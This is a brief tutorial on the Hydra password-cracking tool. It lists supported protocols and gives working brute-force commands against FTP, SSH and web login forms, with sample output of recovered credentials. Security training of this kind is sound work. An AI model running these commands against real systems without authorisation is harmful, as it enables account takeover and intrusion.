What is Hydra? How to use it?
What is Hydra?
Hydra is a brute-force online password cracking program. The Hydra tool can be used to bypass authentication systems using a wordlist and brute force, that is, the trial method.
Imagine trying to manually guess someone’s password on a particular service (SSH, Web Application Form, FTP or SNMP) — we can run Hydra through a list of passwords and speed this process up for us by specifying the correct password.
Hydra can perform a brute force attack on the protocols here.
Asterisk, AFP, Cisco AAA, Cisco authentication, Cisco activation, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP -POST, HTTP-PROXY, HTTPS- FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP , NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1 + v2 + v3 , SOCKS5, SSH (v1 and v2) , SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Hydra Installation
If you’re using Kali Linux, it already has hydra. Or you can download it by typing the following command in Terminal.
Git clone https://github.com/vanhauser-thc/thc-hydra
Hydra Commands
If you type hydra on the command line, a simple user guide will appear.
To bruteforce FTP
hydra -l user -P passlist.txt ftp://ip
-l username
-P password list
To bruteforce SSH
hydra -l <username> -P <pass path> ip -t 4 ssh
Bruteforce any Web Form
We can also use Hydra to bruteforce web forms, you have to make sure you know what type of requests are being made — normally GET or POST methods are used.
Here is an example Hydra command to brute-force the POST login form:
hydra -l [username] -P [password list] [ip or host] http-post-form “/ [login path]:username=[username]&password=^PASS^:[error message]”
error message — it is the message that comes when we enter the wrong password in the form.
Let’s give it a try
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form “/department/login.php:username=admin&password=^PASS^:Invalid Password!”
[80][http-post-form] host: 10.10.10.43 login: admin password: 1q2w3e4r5t
Let’s Try SSH Service
hydra -l username -P rockyou.txt 10.10.10.43 ssh
[22][ssh] host: 10.10.10.43 login: admin password: admin321
let’s try to ftp
hydra -l admin -P passlist.txt ftp://192.133.33.12
[21][ftp] host: 192.133.33.12 login: admin password: admin321
